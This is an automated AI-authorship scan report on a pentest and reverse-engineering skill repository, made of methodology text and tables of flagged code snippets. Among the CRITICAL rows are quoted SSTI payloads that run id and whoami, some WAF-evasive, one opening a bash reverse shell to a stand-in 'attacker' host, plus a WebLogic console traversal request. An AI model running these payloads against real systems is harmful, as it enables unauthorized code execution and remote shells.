Reverse Engineering / Authorized Penetration Testing / Security Research Skill Router Pack AI-powered routing + On-demand toolchain bootstrapping + Self-evolving knowledge base Supports Claude Code, Kiro, Cursor, Cline, and other AI coding clients 逆向/渗透/安全技能路由包 - AI 自动路由 + 按需自举工具链 + 自动进化经验库 | 支持 Claude Code / Kiro / Cursor / Cline 等代码 AI 客户端
This report presents the forensic synthetic code analysis of zhaoxuya520/reverse-skill, a PowerShell project with 8,223 GitHub stars. SynthScan v2.0 examined 134,618 lines of code across 414 source files, recording 191 pattern matches distributed across 13 syntactic categories. The overall adjusted score of 5.0 places this repository in the Low AI signal band.
The scanner applied 160+ deterministic lexical heuristics, multi-line block detectors, abstract syntax tree depth profilers, and a cross-file Jaccard similarity matrix to construct a statistically normalised synthetic code estimate. All matches are individually weighted by severity coefficient and contextual multiplier before summation, and the resulting headline score is temporally discounted to account for the repository's development history relative to the commercial emergence of large language model coding tooling (November 2022 onward).
This chart maps the temporal evolution of the adjusted synthetic code score across successive scan runs. An upward trajectory indicates ongoing incorporation of AI-generated code or expanding LLM-assisted scaffolding; a stable or declining trajectory may reflect active human refactoring, code removal, or the adoption of stricter authorship policies. The dashed secondary line (right axis) independently tracks total raw pattern hit count, which can diverge from the normalised score when codebase size changes significantly between scans.
Classifies detected patterns by their diagnostic confidence and structural impact. CRITICAL patterns (coefficient 10) represent definitive synthetic signatures — hallucinated imports, explicit LLM attribution metadata — virtually never produced by human authors. HIGH (5) indicates strong structural tells such as cross-file repetition or cross-linguistic idioms. MEDIUM (2) covers recognisable conversational padding and AI-specific vocabulary. LOW (1) captures subtle indicators like tautological comments and generic boilerplate that require density to carry independent signal.
This horizontal bar chart decomposes the repository's raw synthetic code score by top-level directory, allowing you to pinpoint precisely which modules or components carry the highest AI authorship density. Directories with disproportionately high scores relative to their size warrant targeted manual review: concentrated AI signatures often trace back to mass-generated configuration layers, auto-ported test suites, LLM-scaffolded boilerplate classes, or entire subsystems authored under heavy copilot assistance. Use this view to prioritise your human code-review effort.
The scanner identified 191 distinct pattern matches across 13 syntactic categories. Each entry below represents a discrete location in the source code where the engine recorded a statistically significant AI authorship indicator. Expand any category row to inspect the individual file paths, line numbers, code snippets, and the lexical context (CODE, COMMENT, or STRING) in which each match was detected.
Reading the findings table: The Severity column indicates the diagnostic confidence level (CRITICAL / HIGH / MEDIUM / LOW). The Context column identifies whether the match occurred inside executable code, an inline comment, or a string literal — comment-context matches receive a ×1.5 weight because LLMs systematically over-annotate. The ⚡ bolt icon marks clustered matches: three or more patterns within a 10-line window, each receiving an additional ×1.5 density multiplier as dense clusters constitute far stronger evidence of synthetic authorship than isolated hits.
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| CRITICAL⚡ | burp-mcp-full/add_methods.py | 50 | api.http().registerHttpHandler(new burp.api.montoya.http.handler.HttpHandler() { | CODE |
| CRITICAL⚡ | burp-mcp-full/add_methods.py | 54 | return burp.api.montoya.http.handler.RequestToBeSentAction.continueWith(m); } | CODE |
| CRITICAL⚡ | burp-mcp-full/add_methods.py | 55 | public burp.api.montoya.http.handler.ResponseReceivedAction handleHttpResponseReceived(burp.api.mont | CODE |
| CRITICAL | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 745 | var highlight = burp.api.montoya.core.HighlightColor.highlightColor(color); | CODE |
| CRITICAL⚡ | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 1375 | httpHandlerRegistration = api.http().registerHttpHandler(new burp.api.montoya.http.handler.HttpHandler() | CODE |
| CRITICAL⚡ | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 1379 | return burp.api.montoya.http.handler.RequestToBeSentAction.continueWith(m); } | CODE |
| CRITICAL⚡ | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 1380 | public burp.api.montoya.http.handler.ResponseReceivedAction handleHttpResponseReceived(burp.api.mont | CODE |
| CRITICAL | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 1180 | GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSessio | CODE |
| CRITICAL⚡ | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 3372 | ${self.module.cache.util.os.popen("id").read()} | CODE |
| CRITICAL⚡ | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 3373 | ${self.module.cache.util.os.popen("whoami").read()} | CODE |
| CRITICAL⚡ | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 3374 | ${self.module.cache.util.os.system("id")} | CODE |
| CRITICAL⚡ | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 3390 | ${self.module.cache.util.os.popen("bash -c \"bash -i >& /dev/tcp/attacker/4444 0>&1\"").read()} | CODE |
| CRITICAL⚡ | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 3398 | ${self.module.cache.util.os.popen("i"+"d").read()} | CODE |
| CRITICAL⚡ | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 3399 | ${self.module.cache.util.os.popen("who"+"ami").read()} | CODE |
| CRITICAL | …st-tools/src-hunter/references/payloader/waf-bypass.md | 3236 | ${self.module.cache.util.os.popen("i"+"d").read()} | CODE |
| CRITICAL | …st-tools/src-hunter/references/payloader/waf-bypass.md | 3237 | ${self.module.cache.util.os.popen("who"+"ami").read()} | CODE |
| CRITICAL | …rc-hunter/references/payloader/by-category/web/框架漏洞.md | 911 | GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSessio | CODE |
| CRITICAL⚡ | …unter/references/payloader/by-category/web/ssti模板注入.md | 619 | ${self.module.cache.util.os.popen("id").read()} | CODE |
| CRITICAL⚡ | …unter/references/payloader/by-category/web/ssti模板注入.md | 620 | ${self.module.cache.util.os.popen("whoami").read()} | CODE |
| CRITICAL⚡ | …unter/references/payloader/by-category/web/ssti模板注入.md | 621 | ${self.module.cache.util.os.system("id")} | CODE |
| CRITICAL⚡ | …unter/references/payloader/by-category/web/ssti模板注入.md | 645 | ${self.module.cache.util.os.popen("bash -c \"bash -i >& /dev/tcp/attacker/4444 0>&1\"").read()} | CODE |
| CRITICAL⚡ | …unter/references/payloader/by-category/web/ssti模板注入.md | 655 | ${self.module.cache.util.os.popen("i"+"d").read()} | CODE |
| CRITICAL⚡ | …unter/references/payloader/by-category/web/ssti模板注入.md | 656 | ${self.module.cache.util.os.popen("who"+"ami").read()} | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| MEDIUM | kali/scripts/bootstrap-reverse.sh | 18 | # ─── 参数解析 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/bootstrap-reverse.sh | 69 | # ─── 辅助函数 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/bootstrap-reverse.sh | 236 | # ─── 能力安装逻辑 ────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/bootstrap-reverse.sh | 460 | # ─── 服务启动 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/bootstrap-reverse.sh | 506 | # ─── 主流程 ──────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 18 | # ─── 参数 ────────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 30 | # ─── 颜色 ────────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 44 | # ─── 检查权限 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 51 | # ─── 检查 Kali 版本 ──────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 64 | # ─── 系统更新 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 75 | # ─── 安装 Kali 2026.1 新工具 ────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 104 | # ─── 安装 Kali 原生 MCP ────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 119 | # ─── 安装 AD/内网渗透工具 ───────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 136 | # ─── 安装非预装逆向工具 ─────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 164 | # ─── 配置 MCP 客户端 ────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 201 | # ─── 刷新工具索引 ────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/quick-setup.sh | 209 | # ─── 输出报告 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/refresh-tool-index.sh | 16 | # ─── 生成 Markdown ──────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/refresh-tool-index.sh | 45 | # ─── 能力状态视图 ────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/refresh-tool-index.sh | 119 | # ─── 生成 JSON ───────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/ida-start.sh | 7 | # ─── 配置(根据你的实际安装修改) ───────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/ida-start.sh | 15 | # ─── 检查 ───────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | kali/scripts/ida-start.sh | 29 | # ─── 杀掉旧进程 ─────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | kali/scripts/ida-start.sh | 34 | # ─── 启动服务 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | kali/scripts/ida-start.sh | 42 | # ─── 等待就绪 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/lib/tool-discovery.sh | 7 | # ─── 路径推导 ─────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/lib/tool-discovery.sh | 15 | # ─── 工具目录定义 ───────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | kali/scripts/lib/tool-discovery.sh | 123 | # ─── 工具发现函数 ───────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/radare2/scripts/recon.sh | 13 | # ─── 参数 ────────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/radare2/scripts/recon.sh | 40 | # ─── 工具检测 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/radare2/scripts/recon.sh | 60 | # ─── 绝对路径 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/radare2/scripts/recon.sh | 65 | # ─── 侦察 ───────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/decode.sh | 14 | # ─── 参数解析 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/decode.sh | 45 | # ─── 工具检测与自动安装 ───────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/decode.sh | 66 | # ─── 路径计算 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | skills/apk-reverse/scripts/decode.sh | 81 | # ─── jadx 反编译 ────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | skills/apk-reverse/scripts/decode.sh | 90 | # ─── apktool 解包 ───────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | skills/apk-reverse/scripts/decode.sh | 99 | # ─── 统计输出 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/rebuild-sign-install.sh | 16 | # ─── 参数 ────────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/rebuild-sign-install.sh | 59 | # ─── 工具检测 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/rebuild-sign-install.sh | 86 | # ─── 生成 debug keystore(如果不存在) ───────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/rebuild-sign-install.sh | 99 | # ─── 路径计算 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | skills/apk-reverse/scripts/rebuild-sign-install.sh | 113 | # ─── 重打包 ─────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | skills/apk-reverse/scripts/rebuild-sign-install.sh | 118 | # ─── 对齐 ───────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM⚡ | skills/apk-reverse/scripts/rebuild-sign-install.sh | 123 | # ─── 签名 ───────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/rebuild-sign-install.sh | 134 | # ─── 验证 ───────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/rebuild-sign-install.sh | 148 | # ─── 安装 ───────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/frida-run.sh | 15 | # ─── 参数 ────────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/frida-run.sh | 43 | # ─── 工具检测 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/frida-run.sh | 61 | # ─── 列出设备 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/frida-run.sh | 72 | # ─── 列出进程 ────────────────────────────────────────────────────────────────────── | COMMENT |
| MEDIUM | skills/apk-reverse/scripts/frida-run.sh | 83 | # ─── 注入执行 ────────────────────────────────────────────────────────────────────── | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW⚡ | skills/ida-reverse/SKILL.md | 224 | ### Step 1: 启动服务器 | COMMENT |
| LOW⚡ | skills/ida-reverse/SKILL.md | 231 | ### Step 2: 打开文件 | COMMENT |
| LOW⚡ | skills/ida-reverse/SKILL.md | 238 | ### Step 3: 全局概览 | COMMENT |
| LOW⚡ | skills/ida-reverse/SKILL.md | 249 | ### Step 4: 深入关键函数 | COMMENT |
| LOW⚡ | skills/ida-reverse/SKILL.md | 259 | ### Step 5: 数据流和交叉引用 | COMMENT |
| LOW⚡ | skills/ida-reverse/SKILL.md | 266 | ### Step 6: 记录和优化 | COMMENT |
| LOW⚡ | skills/ida-reverse/SKILL.md | 272 | ### Step 7: 输出报告 | COMMENT |
| LOW⚡ | …test-tools/src-hunter/references/playbooks/api-rest.md | 1957 | # Step 1: 记录有效Token | COMMENT |
| LOW⚡ | …test-tools/src-hunter/references/playbooks/api-rest.md | 1960 | # Step 2: 等待Token过期/注销账号 | COMMENT |
| LOW⚡ | …test-tools/src-hunter/references/playbooks/api-rest.md | 1961 | # Step 3: 尝试用旧Token建立WebSocket连接 | COMMENT |
| LOW | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 4645 | # Step 1: 污染原型 | COMMENT |
| LOW | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 4648 | # Step 2: 等待jQuery调用 $(element).html() 或 $.html() | COMMENT |
| LOW | …c-hunter/references/payloader/by-category/web/原型链污染.md | 164 | # Step 1: 污染原型 | COMMENT |
| LOW | …c-hunter/references/payloader/by-category/web/原型链污染.md | 167 | # Step 2: 等待jQuery调用 $(element).html() 或 $.html() | COMMENT |
| LOW⚡ | …er/references/payloader/by-category/web/websocket安全.md | 372 | # Step 1: 记录有效Token | COMMENT |
| LOW⚡ | …er/references/payloader/by-category/web/websocket安全.md | 375 | # Step 2: 等待Token过期/注销账号 | COMMENT |
| LOW⚡ | …er/references/payloader/by-category/web/websocket安全.md | 376 | # Step 3: 尝试用旧Token建立WebSocket连接 | COMMENT |
| LOW⚡ | skills/pentest-tools/references/msf-protocol.md | 41 | # Step 1: 先查端口 | COMMENT |
| LOW⚡ | skills/pentest-tools/references/msf-protocol.md | 44 | # Step 2: 启动 RPC daemon,detach=true(让它独立活着) | COMMENT |
| LOW⚡ | skills/pentest-tools/references/msf-protocol.md | 47 | # Step 3: 客户端连接,detach=false | COMMENT |
| LOW⚡ | skills/pentest-tools/references/msf-protocol.md | 50 | # Step 4: 之后再连,能看到同一批 sessions | COMMENT |
| LOW⚡ | …atch-diff-exploit/references/patch-tuesday-workflow.md | 93 | # Step 1: MSU 是 cab 套娃,先解外层 | COMMENT |
| LOW⚡ | …atch-diff-exploit/references/patch-tuesday-workflow.md | 96 | # Step 2: 解里面的 .cab | COMMENT |
| LOW⚡ | …atch-diff-exploit/references/patch-tuesday-workflow.md | 99 | # Step 3: 关键文件在 amd64_microsoft-windows-{component}_*\ 下 | COMMENT |
| LOW⚡ | skills/reverse-engineering/patterns-ctf-3.md | 117 | # Step 1: Bypass ptrace anti-debug | COMMENT |
| LOW⚡ | skills/reverse-engineering/patterns-ctf-3.md | 125 | # Step 2: Run under strace, capture ioctl calls | COMMENT |
| LOW⚡ | skills/reverse-engineering/patterns-ctf-3.md | 128 | # Step 3: Decode timing patterns | COMMENT |
| LOW⚡ | skills/reverse-engineering/tools.md | 379 | # Step 1: XOR decode | COMMENT |
| LOW⚡ | skills/reverse-engineering/tools.md | 384 | # Step 2: Base64 decode | COMMENT |
| LOW⚡ | skills/reverse-engineering/tools.md | 387 | # Step 3: AES-256-CBC decrypt (same value for key and IV) | COMMENT |
| LOW | skills/field-journal/seed-006_ssrf-cloud-metadata.md | 59 | # Step 1: 获取 Token | COMMENT |
| LOW | skills/field-journal/seed-006_ssrf-cloud-metadata.md | 63 | # Step 2: 带 Token 请求 | COMMENT |
| LOW⚡ | …ills/firmware-pentest/references/emulation-and-fuzz.md | 94 | # Step 1: 注册固件到数据库 | COMMENT |
| LOW⚡ | …ills/firmware-pentest/references/emulation-and-fuzz.md | 98 | # Step 2: 识别架构 | COMMENT |
| LOW⚡ | …ills/firmware-pentest/references/emulation-and-fuzz.md | 103 | # Step 3: 把内核 + rootfs 装配成可启动 image | COMMENT |
| LOW⚡ | …ills/firmware-pentest/references/emulation-and-fuzz.md | 107 | # Step 4: 推断网络配置(DHCP / 静态 IP) | COMMENT |
| LOW⚡ | …ills/firmware-pentest/references/emulation-and-fuzz.md | 110 | # Step 5: 启动 | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | …test-tools/src-hunter/references/playbooks/api-rest.md | 2024 | except Exception as e: | CODE |
| LOW | …ools/src-hunter/references/playbooks/http-smuggling.md | 753 | except Exception as e: | CODE |
| LOW | …ools/src-hunter/references/playbooks/oauth-saml-jwt.md | 1596 | except Exception as e: | CODE |
| LOW | …ools/src-hunter/references/playbooks/oauth-saml-jwt.md | 2378 | except Exception as e: | CODE |
| LOW | …st-tools/src-hunter/references/payloader/waf-bypass.md | 3888 | except Exception as e: | CODE |
| LOW | …st-tools/src-hunter/references/payloader/waf-bypass.md | 3927 | except Exception as e: | CODE |
| LOW | …rc-hunter/references/payloader/by-category/web/请求走私.md | 656 | except Exception as e: | CODE |
| LOW | …rc-hunter/references/payloader/by-category/web/认证漏洞.md | 1517 | except Exception as e: | CODE |
| LOW | …rc-hunter/references/payloader/by-category/web/认证漏洞.md | 1556 | except Exception as e: | CODE |
| LOW | …c-hunter/references/payloader/by-category/web/开放重定向.md | 312 | except Exception as e: | CODE |
| LOW | …er/references/payloader/by-category/web/websocket安全.md | 446 | except Exception as e: | CODE |
| LOW | …/reverse-engineering/references/ollvm-deobfuscation.md | 363 | except Exception as e: | CODE |
| LOW | skills/scripts/bootstrap-reverse.sh | 310 | except Exception: | CODE |
| LOW | skills/scripts/bootstrap-reverse.sh | 349 | except Exception: | CODE |
| LOW | skills/scripts/refresh-tool-index.sh | 242 | except Exception: | CODE |
| LOW | skills/scripts/refresh-tool-index.sh | 251 | except Exception: | CODE |
| LOW | skills/scripts/refresh-tool-index.sh | 262 | except Exception: | CODE |
| LOW | skills/scripts/refresh-tool-index.sh | 270 | except Exception: | CODE |
| LOW | skills/scripts/refresh-tool-index.sh | 284 | except Exception: | CODE |
| LOW | skills/scripts/refresh-tool-index.sh | 392 | except Exception: | CODE |
| MEDIUM | skills/scripts/refresh-tool-index.sh | 265 | def tcp_open(port, timeout=1.0): | CODE |
| MEDIUM | skills/scripts/refresh-tool-index.sh | 273 | def mcp_http_handshake(port, timeout=3): | CODE |
| LOW | skills/diagram-generator/scripts/render_diagram.py | 157 | except Exception as exc: | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 302 | String placeholder = params.has("placeholder") ? params.get("placeholder").getAsString() : "@@"; | CODE |
| LOW | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 358 | String placeholder = params.has("placeholder") ? params.get("placeholder").getAsString() : "@@"; | CODE |
| LOW | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 651 | String placeholder = params.has("placeholder") ? params.get("placeholder").getAsString() : "@@"; | CODE |
| LOW | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 1109 | String placeholder = params.has("placeholder") ? params.get("placeholder").getAsString() : "@@"; | CODE |
| LOW | …-mcp-full/src/main/java/com/burpmcp/McpHttpServer.java | 1142 | String placeholder = params.has("placeholder") ? params.get("placeholder").getAsString() : "@@"; | CODE |
| LOW | …test-tools/src-hunter/references/playbooks/api-rest.md | 741 | check3: userExists(email: "test@test.com") | CODE |
| LOW | …test-tools/src-hunter/references/playbooks/api-rest.md | 1331 | "email": "test@test.com" | CODE |
| LOW | …test-tools/src-hunter/references/playbooks/api-rest.md | 1338 | "email": "test@test.com", | CODE |
| LOW⚡ | …test-tools/src-hunter/references/playbooks/api-rest.md | 1352 | "email": "test@test.com", | CODE |
| LOW⚡ | …test-tools/src-hunter/references/playbooks/api-rest.md | 1359 | "email": "test@test.com", | CODE |
| LOW⚡ | …test-tools/src-hunter/references/playbooks/api-rest.md | 1366 | "email": "test@test.com", | CODE |
| LOW | …c-hunter/references/payloader/by-category/web/api安全.md | 612 | check3: userExists(email: "test@test.com") | CODE |
| LOW | …c-hunter/references/payloader/by-category/web/api安全.md | 1460 | "email": "test@test.com" | CODE |
| LOW | …c-hunter/references/payloader/by-category/web/api安全.md | 1467 | "email": "test@test.com", | CODE |
| LOW⚡ | …c-hunter/references/payloader/by-category/web/api安全.md | 1484 | "email": "test@test.com", | CODE |
| LOW⚡ | …c-hunter/references/payloader/by-category/web/api安全.md | 1491 | "email": "test@test.com", | CODE |
| LOW⚡ | …c-hunter/references/payloader/by-category/web/api安全.md | 1498 | "email": "test@test.com", | CODE |
| LOW | skills/api-security/references/rest-graphql-testing.md | 63 | {"email": "user@example.com", "role": "admin", "isAdmin": true} | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | kali/scripts/bootstrap-reverse.sh | 1 | #!/usr/bin/env bash | COMMENT |
| LOW | kali/scripts/quick-setup.sh | 1 | #!/usr/bin/env bash | COMMENT |
| LOW | …pply-chain-security/references/sbom-sca-methodology.md | 41 | ``` | COMMENT |
| LOW | …s/pentest-tools/src-hunter/references/playbooks/rce.md | 1041 | # 清除排除类 | COMMENT |
| LOW | …ls/src-hunter/references/playbooks/intranet-postexp.md | 1901 | # | COMMENT |
| LOW | …ools/src-hunter/references/playbooks/oauth-saml-jwt.md | 1301 | _验证码未一次性失效_ | COMMENT |
| LOW | …ools/src-hunter/references/playbooks/oauth-saml-jwt.md | 1521 | _利用Shiro默认密钥 + 反序列化链实现RCE_ | COMMENT |
| LOW | …ools/src-hunter/references/playbooks/oauth-saml-jwt.md | 2321 | # → SSRF过滤看到target.com(白名单内),放行 | COMMENT |
| LOW | …st-tools/src-hunter/references/payloader/waf-bypass.md | 281 | > 反射绕过 | COMMENT |
| LOW | …rc-hunter/references/payloader/by-category/web/认证漏洞.md | 961 | # - 选择XSW攻击类型(1-8) | COMMENT |
| LOW | …rc-hunter/references/payloader/by-category/web/认证漏洞.md | 1441 | # 原理: AES-CBC加密(默认密钥) → Base64编码 → Cookie | COMMENT |
| LOW | …c-hunter/references/payloader/by-category/web/开放重定向.md | 261 | # 1. 短链接服务重定向: | COMMENT |
| LOW | …unter/references/payloader/by-category/web/缓存与cdn安全.md | 341 | > 查看邮件源码中的Received头 | COMMENT |
| LOW | skills/edr-bypass-re/references/unhook-techniques.md | 81 | 1. 把 .asm 加入项目,启用 MASM (Custom Build Tool) | COMMENT |
| LOW | skills/pwn-chain/references/stack-pwn.md | 181 | # 0xe3afe execve("/bin/sh", r15, r12) | COMMENT |
| LOW | skills/reverse-engineering/tools-advanced.md | 441 | **Strengths:** Multi-arch support (x86, ARM, MIPS, PowerPC, PIC32), free, produces compilable C. Good for architectures | COMMENT |
| LOW | skills/reverse-engineering/platforms.md | 381 | # eBPF bytecode analysis | COMMENT |
| LOW | skills/reverse-engineering/languages-compiled.md | 381 | ```text | COMMENT |
| LOW | skills/scripts/bootstrap-reverse.sh | 1 | #!/usr/bin/env bash | COMMENT |
| LOW | skills/api-security/references/jwt-oauth-testing.md | 1 | # JWT + OAuth 2.0 安全测试 | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| HIGH | burp-mcp-full/add_methods.py | 24 | try { String hasNotes = params.has("has_notes") ? params.get("has_notes").getAsString() : null; | CODE |
| HIGH | burp-mcp-full/add_methods.py | 28 | for (int i = history.size() - 1; i >= 0 && c < limit; i--) { | CODE |
| HIGH⚡ | burp-mcp-full/add_methods.py | 53 | if (!httpHandlerMatch.isEmpty()) m = HttpRequest.httpRequest(m.httpService(), m.toString().repla | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| MEDIUM | README_AI.md | 130 | ├── attack-chain\ # Multi-stage attack-chain orchestration | CODE |
| MEDIUM | …rc-hunter/references/playbooks/llm-prompt-injection.md | 1 | # LLM / Prompt Injection / RAG / Agent | COMMENT |
| MEDIUM | …rc-hunter/references/playbooks/llm-prompt-injection.md | 106 | ### 3.4 RAG 投毒 | COMMENT |
| MEDIUM | …lm-security/references/prompt-injection-methodology.md | 45 | ### Level 5 — 间接注入(RAG) | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | …rc-hunter/references/playbooks/llm-prompt-injection.md | 655 | def generate_adversarial_patch(model, target_class, patch_size=50, epochs=500): | CODE |
| LOW | …ools/src-hunter/references/playbooks/http-smuggling.md | 813 | def cache_poison_via_smuggling(host, port): | CODE |
| LOW | …rc-hunter/references/payloader/by-category/web/请求走私.md | 722 | def cache_poison_via_smuggling(host, port): | CODE |
| LOW | …rc-hunter/references/payloader/by-category/web/ai安全.md | 453 | def generate_adversarial_patch(model, target_class, patch_size=50, epochs=500): | CODE |
| LOW | skills/reverse-engineering/languages-platforms.md | 237 | def reconstruct_from_inversions(chars, inv_counts): | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | burp-mcp-full/add_methods.py | 1 | CODE | |
| LOW | skills/diagram-generator/scripts/render_diagram.py | 8 | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | skills/diagram-generator/scripts/render_diagram.py | 75 | CODE | |
| LOW | skills/diagram-generator/scripts/render_diagram.py | 130 | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | skills/scripts/bootstrap-reverse.sh | 12 | # Usage: | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | burp-mcp-full/mcp-bridge.js | 241 | function handleRequest(msg) { | CODE |